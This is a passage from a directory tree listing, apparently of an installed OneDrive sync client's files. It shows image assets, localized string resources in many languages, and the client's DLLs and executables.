│   │       │   │   │   │   │   │   │   │           ├── openFolder20x20.png
│   │       │   │   │   │   │   │   │   │           ├── open-folder_original.png
│   │       │   │   │   │   │   │   │   │           ├── open-folder.png
│   │       │   │   │   │   │   │   │   │           ├── overflow.png
│   │       │   │   │   │   │   │   │   │           ├── pauseIcon22x22.png
│   │       │   │   │   │   │   │   │   │           ├── peopleDark.png
│   │       │   │   │   │   │   │   │   │           ├── people.png
│   │       │   │   │   │   │   │   │   │           ├── phone.png
│   │       │   │   │   │   │   │   │   │           ├── pictures.png
│   │       │   │   │   │   │   │   │   │           ├── profile.png
│   │       │   │   │   │   │   │   │   │           ├── recycle-bin20x20@2x.png
│   │       │   │   │   │   │   │   │   │           ├── recycle-bin20x20.png
│   │       │   │   │   │   │   │   │   │           ├── recycle-bin.png
│   │       │   │   │   │   │   │   │   │           ├── reportProblemIcon22x22.png
│   │       │   │   │   │   │   │   │   │           ├── settingsIcon22x22.png
│   │       │   │   │   │   │   │   │   │           ├── settingsIcon@2x.png
│   │       │   │   │   │   │   │   │   │           ├── settingsIcon.png
│   │       │   │   │   │   │   │   │   │           ├── share20x20@2x.png
│   │       │   │   │   │   │   │   │   │           ├── share20x20.png
│   │       │   │   │   │   │   │   │   │           ├── stack20x20@2x.png
│   │       │   │   │   │   │   │   │   │           ├── stack20x20.png
│   │       │   │   │   │   │   │   │   │           ├── syncIcon.png
│   │       │   │   │   │   │   │   │   │           ├── syncStatusError.png
│   │       │   │   │   │   │   │   │   │           ├── syncStatusOffline.png
│   │       │   │   │   │   │   │   │   │           ├── syncStatusSynced@2x.png
│   │       │   │   │   │   │   │   │   │           ├── syncStatusSynced@3x.png
│   │       │   │   │   │   │   │   │   │           ├── syncStatusSynced.png
│   │       │   │   │   │   │   │   │   │           ├── syncStatusSyncing.png
│   │       │   │   │   │   │   │   │   │           ├── syncStatusWarning.png
│   │       │   │   │   │   │   │   │   │           ├── unlockIcon22x22.png
│   │       │   │   │   │   │   │   │   │           ├── videos.png
│   │       │   │   │   │   │   │   │   │           ├── view-online20x20@2x.png
│   │       │   │   │   │   │   │   │   │           ├── view-online20x20.png
│   │       │   │   │   │   │   │   │   │           ├── view-online.png
│   │       │   │   │   │   │   │   │   │           ├── warning.png
│   │       │   │   │   │   │   │   │   │           └── welcome.png
│   │       │   │   │   │   │   │   │   └── freView
│   │       │   │   │   │   │   │   │       └── assets
│   │       │   │   │   │   │   │   │           ├── dark
│   │       │   │   │   │   │   │   │           │   └── optionalDiagnosticData.png
│   │       │   │   │   │   │   │   │           └── light
│   │       │   │   │   │   │   │   │               └── optionalDiagnosticData.png
│   │       │   │   │   │   │   │   └── index.windows.bundle
│   │       │   │   │   │   │   ├── ca
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ca-Es-VALENCIA
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── Camera_Upload_Success_Dark_728x360.png
│   │       │   │   │   │   │   ├── Camera_Upload_Success_Light_728x360.png
│   │       │   │   │   │   │   ├── Camera_Upload_Upsell_Dark_728x360.png
│   │       │   │   │   │   │   ├── Camera_Upload_Upsell_Light_728x360.png
│   │       │   │   │   │   │   ├── CheckboxWindows.dll
│   │       │   │   │   │   │   ├── CollectSyncLogs.bat
│   │       │   │   │   │   │   ├── com.microsoft.onedrive.nucleus.auth.provider.json
│   │       │   │   │   │   │   ├── concrt140_app.dll
│   │       │   │   │   │   │   ├── concrt140.dll
│   │       │   │   │   │   │   ├── Copilot
│   │       │   │   │   │   │   │   ├── Square44x44Logo.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-16_altform-lightunplated.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-16_altform-unplated.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-16.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-24_altform-lightunplated.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-24_altform-unplated.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-24.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-256_altform-lightunplated.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-256_altform-unplated.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-256.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-32_altform-lightunplated.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-32_altform-unplated.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-32.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-48_altform-lightunplated.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-48_altform-unplated.png
│   │       │   │   │   │   │   │   ├── Square44x44Logo.targetsize-48.png
│   │       │   │   │   │   │   │   └── Strings
│   │       │   │   │   │   │   │       ├── AF-ZA
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── AM-ET
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── AR-SA
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── AS-IN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── AZ-LATN-AZ
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── BG-BG
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── BN-IN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── BS-LATN-BA
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── CA-ES
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── CA-ES-VALENCIA
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── CS-CZ
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── CY-GB
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── DA-DK
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── DE-DE
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── EL-GR
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── EN-GB
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── en-US
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── ES-ES
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── ES-MX
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── ET-EE
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── EU-ES
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── FA-IR
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── FI-FI
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── FIL-PH
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── FR-CA
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── fr-FR
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── GA-IE
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── GD-GB
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── GL-ES
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── GU-IN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── HE-IL
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── HI-IN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── HR-HR
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── HU-HU
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── HY-AM
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── ID-ID
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── IS-IS
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── IT-IT
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── ja-JP
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── KA-GE
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── KK-KZ
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── KM-KH
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── KN-IN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── KOK-IN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── KO-KR
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── LB-LU
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── LO-LA
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── LT-LT
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── LV-LV
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── MI-NZ
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── MK-MK
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── ML-IN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── MR-IN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── MS-MY
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── MT-MT
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── NB-NO
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── NE-NP
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── NL-NL
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── NN-NO
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── OR-IN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── PA-IN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── PL-PL
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── PT-BR
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── PT-PT
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── QUZ-PE
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── ro-RO
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── RU-RU
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── SK-SK
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── SL-SI
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── SQ-AL
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── SR-CYRL-BA
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── SR-CYRL-RS
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── SR-LATN-RS
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── SV-SE
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── TA-IN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── TE-IN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── TH-TH
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── TR-TR
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── TT-RU
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── UG-CN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── UK-UA
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── UR-PK
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── UZ-LATN-UZ
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── VI-VN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       ├── zh-CN
│   │       │   │   │   │   │   │       │   └── Resources.resw
│   │       │   │   │   │   │   │       └── ZH-TW
│   │       │   │   │   │   │   │           └── Resources.resw
│   │       │   │   │   │   │   ├── cs
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── cy-GB
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── da
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── DateTimePicker.dll
│   │       │   │   │   │   │   ├── de
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── DimeErrorPage.html
│   │       │   │   │   │   │   ├── el
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ElevatedAppBlue.png
│   │       │   │   │   │   │   ├── ElevatedAppWhite.png
│   │       │   │   │   │   │   ├── en
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── en-GB
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── en-US
│   │       │   │   │   │   │   │   └── msipc.dll.mui
│   │       │   │   │   │   │   ├── ErrorPage.html
│   │       │   │   │   │   │   ├── ErrorPage.js
│   │       │   │   │   │   │   ├── Error.png
│   │       │   │   │   │   │   ├── es
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── et
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ETWlog.dll
│   │       │   │   │   │   │   ├── eu
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── fa
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── fi
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── FileCoAuth.exe
│   │       │   │   │   │   │   ├── FileCoAuthLib64.dll
│   │       │   │   │   │   │   ├── FileSyncClient.dll
│   │       │   │   │   │   │   ├── FileSyncConfig.exe
│   │       │   │   │   │   │   ├── FileSyncCxP.dll
│   │       │   │   │   │   │   ├── FileSyncCxPImpl.dll
│   │       │   │   │   │   │   ├── FileSyncEvents.dll
│   │       │   │   │   │   │   ├── FileSyncFAL.dll
│   │       │   │   │   │   │   ├── FileSyncFALWB.dll
│   │       │   │   │   │   │   ├── FileSyncFSCache.dll
│   │       │   │   │   │   │   ├── FileSyncFSDbfs.dll
│   │       │   │   │   │   │   ├── FileSyncFSDbfsWB.dll
│   │       │   │   │   │   │   ├── FileSyncFS.dll
│   │       │   │   │   │   │   ├── FileSyncFSNtfs.dll
│   │       │   │   │   │   │   ├── FileSyncFSNtfsWB.dll
│   │       │   │   │   │   │   ├── FileSyncHelper.exe
│   │       │   │   │   │   │   ├── FileSyncHost.dll
│   │       │   │   │   │   │   ├── FileSync.LocalizedResources.dll
│   │       │   │   │   │   │   ├── FileSync.Resources.dll
│   │       │   │   │   │   │   ├── FileSyncRNWin32Lib.dll
│   │       │   │   │   │   │   ├── FileSyncSessions.dll
│   │       │   │   │   │   │   ├── FileSyncShell64.dll
│   │       │   │   │   │   │   ├── FileSyncSqlite3.dll
│   │       │   │   │   │   │   ├── FileSyncTelemetryExtensions.dll
│   │       │   │   │   │   │   ├── FileSyncViews.dll
│   │       │   │   │   │   │   ├── fil-PH
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── fr
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ga-IE
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── gd
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── GetHelpWindow.html
│   │       │   │   │   │   │   ├── gl
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── gu
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── he
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── hermes.dll
│   │       │   │   │   │   │   ├── HeroImage_FirstUploadLowCostSKUToast.png
│   │       │   │   │   │   │   ├── HeroImageForQuotaToastsDark.png
│   │       │   │   │   │   │   ├── HeroImageForQuotaToastsLight.png
│   │       │   │   │   │   │   ├── hi
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── hr
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── hu
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── i386
│   │       │   │   │   │   │   │   ├── FileCoAuthLib.dll
│   │       │   │   │   │   │   │   └── FileSyncShell.dll
│   │       │   │   │   │   │   ├── id
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── ig-NG
│   │       │   │   │   │   │   │   ├── FileSync.LocalizedResources.dll.mui
│   │       │   │   │   │   │   │   └── localizable.json
│   │       │   │   │   │   │   ├── imageformats
│   │       │   │   │   │   │   │   ├── qgif.dll
│   │       │   │   │   │   │   │   ├── qjpeg.dll
│   │       │   │   │   │   │   │   ├── qsvg.dll
│   │       │   │   │   │   │   │   └── qwebp.dll
│   │       │   │   │   │   │   ├── images
│   │       │   │   │   │   │   │   ├── darkTheme
│   │       │   │   │   │   │   │   │   ├── accountDetection.svg
│   │       │   │   │   │   │   │   │   ├── acm_cloud_import.svg
│   │       │   │   │   │   │   │   │   ├── acm_confetti.svg
│   │       │   │   │   │   │   │   │   ├── acmDismissIcon.svg
│   │       │   │   │   │   │   │   │   ├── ACMegaImageForQuotaErrors.svg
│   │       │   │   │   │   │   │   │   ├── acm_low_disk_space_online_only.svg
│   │       │   │   │   │   │   │   │   ├── addedFolderIcon_mac.svg
│   │       │   │   │   │   │   │   │   ├── addedFolderIcon_win.svg
│   │       │   │   │   │   │   │   │   ├── animation_Pause.svg
│   │       │   │   │   │   │   │   │   ├── animation_Play.svg
│   │       │   │   │   │   │   │   │   ├── backArrow.svg
│   │       │   │   │   │   │   │   │   ├── BlueCloudCritical_default.svg
│   │       │   │   │   │   │   │   │   ├── BlueCloudCritical_Win11.svg
│   │       │   │   │   │   │   │   │   ├── BlueCloudFull_default.svg
│   │       │   │   │   │   │   │   │   ├── BlueCloudFull_Win11.svg
│   │       │   │   │   │   │   │   │   ├── BlueCloudOverLimit.svg
│   │       │   │   │   │   │   │   │   ├── blue_cloud.svg
│   │       │   │   │   │   │   │   │   ├── blurrect.png
│   │       │   │   │   │   │   │   │   ├── bugicon.svg
│   │       │   │   │   │   │   │   │   ├── CameraRollBackup.svg
│   │       │   │   │   │   │   │   │   ├── cancelIcon.svg
│   │       │   │   │   │   │   │   │   ├── checkboxComposite.svg
│   │       │   │   │   │   │   │   │   ├── checkmark_hovered.svg
│   │       │   │   │   │   │   │   │   ├── checkmark_in_progress.svg
│   │       │   │   │   │   │   │   │   ├── checkmark_selected.svg
│   │       │   │   │   │   │   │   │   ├── chevron.svg
│   │       │   │   │   │   │   │   │   ├── chevronUp.svg
│   │       │   │   │   │   │   │   │   ├── Clipchamp.svg
│   │       │   │   │   │   │   │   │   ├── clock_icon.svg
│   │       │   │   │   │   │   │   │   ├── CloudIconError.svg
│   │       │   │   │   │   │   │   │   ├── CloudIconOffline.svg
│   │       │   │   │   │   │   │   │   ├── CloudIconPaused.svg
│   │       │   │   │   │   │   │   │   ├── CloudIconSynced.svg
│   │       │   │   │   │   │   │   │   ├── CloudIconSyncing.svg
│   │       │   │   │   │   │   │   │   ├── CloudIconWarning.svg
│   │       │   │   │   │   │   │   │   ├── cloud.svg
│   │       │   │   │   │   │   │   │   ├── ColoredFolders_Flyout.svg
│   │       │   │   │   │   │   │   │   ├── ColoredFolders.svg
│   │       │   │   │   │   │   │   │   ├── completed_icon.svg
│   │       │   │   │   │   │   │   │   ├── Defender.svg
│   │       │   │   │   │   │   │   │   ├── Designer.svg
│   │       │   │   │   │   │   │   │   ├── dialog_dismiss.svg
│   │       │   │   │   │   │   │   │   ├── done_graphic.svg
│   │       │   │   │   │   │   │   │   ├── errorIcon2.svg
│   │       │   │   │   │   │   │   │   ├── errorIcon.svg
│   │       │   │   │   │   │   │   │   ├── excel.svg
│   │       │   │   │   │   │   │   │   ├── exclamation.svg
│   │       │   │   │   │   │   │   │   ├── exiticon.svg
│   │       │   │   │   │   │   │   │   ├── eyelash.svg
│   │       │   │   │   │   │   │   │   ├── feedbackIcon.svg
│   │       │   │   │   │   │   │   │   ├── fileLockIcon.svg
│   │       │   │   │   │   │   │   │   ├── filesNotSyncingDisabled.svg
│   │       │   │   │   │   │   │   │   ├── filesNotSyncing.svg
│   │       │   │   │   │   │   │   │   ├── file.svg
│   │       │   │   │   │   │   │   │   ├── finderExtensionPrompt.svg
│   │       │   │   │   │   │   │   │   ├── folderIcon20x20.svg
│   │       │   │   │   │   │   │   │   ├── folderIcon2.svg
│   │       │   │   │   │   │   │   │   ├── folderIcon.svg
│   │       │   │   │   │   │   │   │   ├── folder_image_desktop_mac.svg
│   │       │   │   │   │   │   │   │   ├── folder_image_desktop.svg
│   │       │   │   │   │   │   │   │   ├── folder_image_documents_mac.svg
│   │       │   │   │   │   │   │   │   ├── folder_image_documents.svg
│   │       │   │   │   │   │   │   │   ├── folder_image_pictures_mac.svg
│   │       │   │   │   │   │   │   │   ├── folder_image_pictures.svg
│   │       │   │   │   │   │   │   │   ├── forwardArrow.svg
│   │       │   │   │   │   │   │   │   ├── fre_choose_folder.js
│   │       │   │   │   │   │   │   │   ├── fre_choose_folder.svg
│   │       │   │   │   │   │   │   │   ├── fre_done.js
│   │       │   │   │   │   │   │   │   ├── fre_done.svg
│   │       │   │   │   │   │   │   │   ├── fre_email_hrd.js
│   │       │   │   │   │   │   │   │   ├── fre_email_hrd.svg
│   │       │   │   │   │   │   │   │   ├── fre_email_hrd_win7.svg
│   │       │   │   │   │   │   │   │   ├── freeUpSpace.svg
│   │       │   │   │   │   │   │   │   ├── FRE_Tutorial_FilesOnDemand_Important.svg
│   │       │   │   │   │   │   │   │   ├── FRE_Tutorial_FilesOnDemand_OnlineOnly.svg
│   │       │   │   │   │   │   │   │   ├── FRE_Tutorial_FilesOnDemand_Placeholder.svg
│   │       │   │   │   │   │   │   │   ├── FRE_Tutorial_Intro.js
│   │       │   │   │   │   │   │   │   ├── FRE_Tutorial_Intro.svg
│   │       │   │   │   │   │   │   │   ├── FRE_Tutorial_Mobile.js
│   │       │   │   │   │   │   │   │   ├── FRE_Tutorial_Mobile.svg
│   │       │   │   │   │   │   │   │   ├── FRE_Tutorial_Share.js
│   │       │   │   │   │   │   │   │   ├── FRE_Tutorial_Share.svg
│   │       │   │   │   │   │   │   │   ├── globeIcon20x20.svg
│   │       │   │   │   │   │   │   │   ├── globeIcon2.svg
│   │       │   │   │   │   │   │   │   ├── globeIcon.svg
│   │       │   │   │   │   │   │   │   ├── globe.svg
│   │       │   │   │   │   │   │   │   ├── helpicon.svg
│   │       │   │   │   │   │   │   │   ├── helpSubIcon.svg
│   │       │   │   │   │   │   │   │   ├── HeroImage_FolderBackupACM.svg
│   │       │   │   │   │   │   │   │   ├── houseIcon.svg
│   │       │   │   │   │   │   │   │   ├── iceBucket.svg
│   │       │   │   │   │   │   │   │   ├── infiniteDiamond.webp
│   │       │   │   │   │   │   │   │   ├── infiniteLightRayDiamond.webp
│   │       │   │   │   │   │   │   │   ├── InfoBlue.svg
│   │       │   │   │   │   │   │   │   ├── infoIcon.svg
│   │       │   │   │   │   │   │   │   ├── infoIconYellow.svg
│   │       │   │   │   │   │   │   │   ├── kfm_acm_gpo.svg
│   │       │   │   │   │   │   │   │   ├── kfmAllBackedUp.svg
│   │       │   │   │   │   │   │   │   ├── kfmCloseFileToBackup.svg
│   │       │   │   │   │   │   │   │   ├── kfm_mega_gpo.svg
│   │       │   │   │   │   │   │   │   ├── layerIcon.svg
│   │       │   │   │   │   │   │   │   ├── lightBulb.svg
│   │       │   │   │   │   │   │   │   ├── lightRayDiamond.webp
│   │       │   │   │   │   │   │   │   ├── list_checkbox.svg
│   │       │   │   │   │   │   │   │   ├── loading_spinner_arrow.svg
│   │       │   │   │   │   │   │   │   ├── loading_spinner.svg
│   │       │   │   │   │   │   │   │   ├── loading.svg
│   │       │   │   │   │   │   │   │   ├── lock_graphic.svg
│   │       │   │   │   │   │   │   │   ├── lock_icon.svg
│   │       │   │   │   │   │   │   │   ├── lockIcon.svg
│   │       │   │   │   │   │   │   │   ├── mac_fre_choose_folder.js
│   │       │   │   │   │   │   │   │   ├── mac_FRE_Tutorial_Intro.js
│   │       │   │   │   │   │   │   │   ├── mac_FRE_Tutorial_Share.js
│   │       │   │   │   │   │   │   │   ├── manageStorage.svg
│   │       │   │   │   │   │   │   │   ├── onDemandFilesDehydrate.svg
│   │       │   │   │   │   │   │   │   ├── onDemandFiles.svg
│   │       │   │   │   │   │   │   │   ├── onDemandSelectiveSync.svg
│   │       │   │   │   │   │   │   │   ├── onenote.svg
│   │       │   │   │   │   │   │   │   ├── openFileIcon.svg
│   │       │   │   │   │   │   │   │   ├── openFolder.svg
│   │       │   │   │   │   │   │   │   ├── optionalDiagnosticData.svg
│   │       │   │   │   │   │   │   │   ├── outlook.svg
│   │       │   │   │   │   │   │   │   ├── overflowIcon.svg
│   │       │   │   │   │   │   │   │   ├── partiallyFreezing.svg
│   │       │   │   │   │   │   │   │   ├── paused.svg
│   │       │   │   │   │   │   │   │   ├── pauseIcon.svg
│   │       │   │   │   │   │   │   │   ├── powerpoint.svg
│   │       │   │   │   │   │   │   │   ├── premium_gem.svg
│   │       │   │   │   │   │   │   │   ├── premiumIcon20x20.svg
│   │       │   │   │   │   │   │   │   ├── premiumIcon2.svg
│   │       │   │   │   │   │   │   │   ├── premiumIcon.svg
│   │       │   │   │   │   │   │   │   ├── recycleBinIcon20x20.svg
│   │       │   │   │   │   │   │   │   ├── recycleBinIcon.svg
│   │       │   │   │   │   │   │   │   ├── recycleBin.svg
│   │       │   │   │   │   │   │   │   ├── reportProblemicon.svg
│   │       │   │   │   │   │   │   │   ├── requiredDiagnosticData.svg
│   │       │   │   │   │   │   │   │   ├── reSignIn.svg
│   │       │   │   │   │   │   │   │   ├── resumeIcon.svg
